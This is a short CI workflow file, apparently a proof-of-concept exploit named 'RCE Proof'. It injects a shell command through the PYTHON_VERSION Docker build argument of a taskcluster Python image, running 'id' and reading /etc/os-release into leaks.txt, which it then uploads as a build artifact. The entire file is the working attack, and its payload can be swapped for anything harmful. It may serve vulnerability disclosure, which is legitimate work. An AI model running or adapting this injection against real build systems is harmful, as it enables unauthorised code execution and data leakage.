name: RCE Proof
on: [push]

jobs:
  attack:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Exploit
        run: |
          cd taskcluster/docker/python
          docker build \
            --build-arg PYTHON_VERSION='id > leaks.txt; cat /etc/os-release >> leaks.txt' \
            -t silent-exploit .
      - name: Upload Proof
        uses: actions/upload-artifact@v4
        with:
          name: leaks.txt
          path: taskcluster/docker/python/leaks.txt
